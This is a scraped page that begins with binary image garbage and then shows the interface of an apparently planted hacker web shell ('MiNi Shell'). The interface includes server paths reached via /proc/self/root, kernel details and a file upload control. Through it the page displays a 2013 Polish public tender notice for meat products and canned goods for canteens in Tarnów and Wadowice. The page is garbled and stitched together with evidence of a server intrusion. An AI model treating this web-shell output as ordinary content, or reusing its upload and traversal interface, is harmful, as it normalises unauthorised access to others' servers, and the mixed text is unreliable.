JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130412/144936-N-2013.html

<p class="kh_header"><b>Rzeszów: Sukcesywna dostawa produktów mięsnych, wędlin i pasztetów na potrzeby Kantyny Oddziału Zamawiającego w Tarnowie, celem dalszej odsprzedaży</b><br>
<b>Numer ogłoszenia: 144936 - 2013; data zamieszczenia: 12.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Podkarpacka Instytucja Gospodarki Budżetowej CARPATIA , ul. hr. Wandy Tarnowskiej 4, 35-322 Rzeszów, woj. podkarpackie, tel. 17 85 35 247, faks 17 85 07 864.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa produktów mięsnych, wędlin i pasztetów na potrzeby Kantyny Oddziału Zamawiającego w Tarnowie, celem dalszej odsprzedaży.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1 - zabezpieczenie potrzeb Kantyny Zamawiającego O.Tarnów 1Szynka pieczona krakowska w kawału (opakowanie vacum około 325g) producent Łukosz lub produkt równoważny o następujących właściwościach: skład: mięso z indyka nie mniej niż 78%, woda, emulsja wieprzowa, skrobia ziemniaczana, sól, glukoza, hydrolizant białka sojowego, substancje zagęszczające E 407A, E 425. 700 kg
2Szynka Polska masa netto nie mniej niż 110g Werbliński producent Zakłady Mięsne Werbliński lub produkt równoważny o następujących właściwościach: skład : mięso wieprzowe nie mniej niż 50%, woda, mięso drobiowe nie mniej niż 10%, skrobia ziemniaczana, sól, białko sojowe, cukier, przyprawy i ekstrakty przypraw, soja, E450i, E450iii, E451i, E621, E316,E250 6000 szt 3Konserwa Golonka Dębicka masa netto nie mniej niż 300g z otwieraczem producent Pamapol lub produkt równoważny o następujących właściwościach: skład: mięso wieprzowe nie mniej niż  64%, woda, skórki wieprzowe nie mniej niż  4%, glukoza, laktoza (z mleka), E451i, E301, E621, E635, E621, E452, śladowe ilości jaj, selera, glutenu, SO2. 400 szt 4Pasztet Werbliński masa netto nie mniej niż 130g  z drobiem producent Zakłady Mięsne Werbliński lub produkt równoważny o następujących właściwościach: skład: woda, surowce drobiowe nie mniej niż 35% ( mięso oddzielone mechanicznie z kurcząt), tłuszcz wieprzowy nie mniej niż 12%, mąka pszenna (gluten), skórki wieprzowe, skrobia, sól, przyprawy, białka mleka. 3250 szt 5Golonka Polska masa netto nie mniej niż 110g Werbliński producent Zakłady Mięsne Werbliński lub produkt równoważny o następujących właściwościach: skład: mięso wieprzowe nie mniej niż 60%, woda, skrobia ziemniaczana, sól, białko sojowe, cukier, przyprawy i ekstrakty przypraw, soja, gorczyca, E450i, E450iii, E451i, E621, E316, E250. 5000 szt 6 Boczek mielony masa netto nie mniej niż 130g Werbliński producent Zakłady Mięsne Werbliński lub produkt równoważny o następujących właściwościach: skład: mięso wieprzowe nie mniej niż 50%, woda, skórki wieprzowe, skrobia ziemniaczana, sól, przyprawy i ekstrakty przypraw, białko sojowe, E450i, E450iii, E451i, E621, E316, E250 1500 szt 7 Smalec z mięsem masa netto nie mniej niż 125g Werbliński producent Zakłady Mięsne Werbliński lub produkt równoważny o następujących właściwościach: skład: tłuszcz wieprzowy nie mniej niż 30%, woda, mięso wieprzowe nie mniej niż 28%, skórki wieprzowe nie mniej niż 2%, skrobia ziemniaczana, sól, przyprawy i ekstrakty przypraw, błonnik pszenny, E621, E316, E250. 12000 szt 8 Szynka mielona drobiowa masa netto nie mniej niż 110g Werbliński producent Zakłady Mięsne Werbliński lub produkt równoważny o następujących właściwościach: skład: woda, mięso z kurcząt nie mniej niż 19%, skrobia ziemniaczana, sól, białko sojowe, przyprawy i ekstrakty przypraw, soja, gorczyca, E450i, E450iii, E451i, E621, E316, E250 5000 szt 9Szynka mielona masa netto nie mniej niż 130g Werbliński producent Zakłady Mięsne Werbliński lub produkt równoważny o następujących właściwościach: skład: mięso wieprzowe nie mniej niż 50%, woda, mięso drobiowe nie mniej niż 5%, skórki wieprzowe, skrobia ziemniaczana, sól, przyprawy i ekstrakty przypraw, białko sojowe,  E450i, E450iii, E451i, E621, E316, E250 5000 szt 10Pasztet Werbliński masa netto nie mniej niż 130g z pieczarkami producent Zakłady Mięsne Werbliński lub produkt równoważny o następujących właściwościach: skład: woda, skórki z kurcząt nie mniej niż 24%, mięso oddzielone mechanicznie z kurcząt nie mniej niż 22,8%, wątróbka z kurcząt nie mniej niż 10,8%, mąka pszenna, sól, przyprawy i ekstrakty z przypraw, skrobia ziemniaczana, białko sojowe, błonnik pszenny, pieczarka suszona nie mniej niż 0,03%, gluten, soja, gorczyca, seler 3250 szt 11Pasztet Werbliński masa netto nie mniej niż 130g  z drobiem i papryką  producent Zakłady Mięsne Werbliński lub produkt równoważny o następujących właściwościach: skład: woda, surowce drobiowe nie mniej niż 35% ( mięso oddzielone mechanicznie z kurcząt, wątroba z kurcząt), tłuszcz wieprzowy nie mniej niż 12%, mąka pszenna (gluten), skórki wieprzowe, skrobia, sól, przyprawy, białka mleka, papryka suszona nie mniej niż 0,9%, E301, E250. 3250 szt 12Pasztet Werbliński masa netto nie mniej niż 130g  z drobiem i papryką  producent Zakłady Mięsne Werbliński lub produkt równoważny o następujących właściwościach: skład: woda, surowce drobiowe nie mniej niż 33% ( mięso oddzielone mechanicznie z kurcząt, wątroba z kurcząt), tłuszcz wieprzowy nie mniej niż 12%, mąka pszenna (gluten), skórki wieprzowe, skrobia, sól, przyprawy, białka mleka, koncentrat pomidorowy (36%-38%),  E301, E250 3250 szt Część 2 - zabezpieczenie potrzeb Kantyny Zamawiającego O.Wadowice 1Gulasz angielski Sokołów lub produkt równoważny o następujących właściwościach : mielonka wieprzowa sterylizowana , skład : mięso wieprzowe nie mniej niż 71 % , masa netto nie mniejsza niż 160 g, opakowanie :puszka stalowa, łatwootwieralna 750 szt 2Gulasz angielski Sokołów lub produkt równoważny o następujących właściwościach : mielonka wieprzowa sterylizowana , skład : mięso wieprzowe nie mniej niż 61 % , masa netto nie mniejsza niż 290 g, opakowanie :puszka stalowa, łatwootwieralna 750 szt 3Pasztet drobiowy Drop  lub produkt równoważny o następujących właściwościach :konserwa drobiowa sterylizowana skład : surowce drobiowe nie mniej niż 34 % (mięso z kurcząt, wątroba z kurcząt, masa jajowa), masa netto nie mniejsza niż 160 g, opakowanie :puszka stalowa, łatwootwieralna 1400 szt 4Wołowina we własnym sosie Sokołów lub produkt równoważny o następujących właściwościach :konserwa grubo rozdrobniona sterylizowana, skład : mięso wołowe nie mniej niż 64 %, skórki wieprzowe nie więcej niż 11%,  masa netto nie mniejsza niż 300 g, opakowanie: puszka stalowa, łatwootwieralna 400 szt 5Gołąbki w sosie pomidorowym Pamapol lub produkt równoważny o następujących właściwościach : skład : farsz nie mniej niż 24 % (mięso wieprzowe  nie mniej niż 8 %,wołowe, ryż  , mięso z kurczaka, skórki wieprzowe), kapusta, warzywa, koncentrat pomidorowy nie mniej niż 1,3 % , masa netto nie mnij niż 500 g, opakowanie : słoik szklany z zakrętką. 70 szt 6 Gulasz wieprzowo-wołowy Pamapol lub produkt równoważny o następujących właściwościach : gulasz wieprzowo-wołowy w sosie pomidorowym o składzie: mięso wieprzowe nie mniej niż 18,5 %, serca wieprzowe, boczek wieprzowy  ,mięso wołowe nie mniej niż 2,6 % , koncentrat pomidorowy nie mniej niż 6,9 %, cebula,  masa netto nie mniej niż 500 g , opakowanie : słoik szklany z zakrętką 90 szt 7Fasolka po bretońsku z kiełbasą Pamapol lub produkt równoważny o następujących właściwościach : fasola z kiełbasą w sosie pomidorowym o składzie :fasola biała gotowana nie mniej niż 40 %, kiełbasa nie mniej niż 7 %,mięso wieprzowe, z kurczaka,  mięso wołowe, skórki wieprzowe , koncentrat pomidorowy nie mniej niż 1,82 %, warzywa suszone, masa netto nie mniej niż 500 g , opakowanie : słoik szklany z zakrętką 50 szt.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. pełnomocnictwo do reprezentowania wykonawcy w postępowaniu, z którego wynika zakres umocowania, podpisane przez osoby uprawnione do reprezentowania Wykonawcy (jeżeli Wykonawca jest reprezentowany przez pełnomocnika lub jeżeli istnieje ustawowy obowiązek ustanowienia pełnomocnika)
2. pisemne zobowiązanie wystawione przez uprawomocnionego lub upoważnionego przedstawiciela podmiotu udostępniającego wiedzę i doświadczenie, potencjał techniczny, osoby zdolne do wykonania zamówienia lub zdolności finansowe (jeżeli dotyczy)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany treści umowy, gdy:
1)zaistnieją zdarzenia uniemożliwiające wykonanie umowy w ustalonym terminie z przyczyn niezależnych od Wykonawcy lub Zamawiającego, udokumentowany w sposób nie budzący zastrzeżeń, wówczas zmianie ulegnie termin jej wykonania, określony w § 3 ust. 1 w projekcie umowy.
2)Zmianie ulegną bieżące potrzeby Zamawiającego poprzez wzrost lub spadek popytu na poszczególne asortymenty należące do przedmiotu zamówienia w granicach do 20% nie powodujące przekroczenia wartości zamówienia (umowy).
3)Zamawiający nie wykorzysta min. 80% wartości umowy, wówczas przewiduje się możliwość przedłużenia okresu obowiązywania umowy o dalsze 6 miesięcy.
4)w przypadku zmiany stawki podatku VAT zmianie ulegną ceny jednostkowe brutto produktów określonych w załączniku nr 1 do umowy - w stosunku do produktów, których zmiana dotyczy
5)potrzeba zmiany umowy wynika ze zmiany przepisów prawa lub ze zmian organizacyjnych Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.igbcarpatia.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Podkarpacka Instytucja Gospodarki Budżetowej CARPATIA Oddział Tarnów: 33-100 Tarnów, ul. Konarskiego 2b..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2013 godzina 09:30, miejsce: Podkarpacka Instytucja Gospodarki Budżetowej CARPATIA Oddział Tarnów: 33-100 Tarnów, ul. Konarskiego 2b sekretariat Z-cy Dyrektora PIGB, Kierownika Oddziału Tarnów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 17.05.2013.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com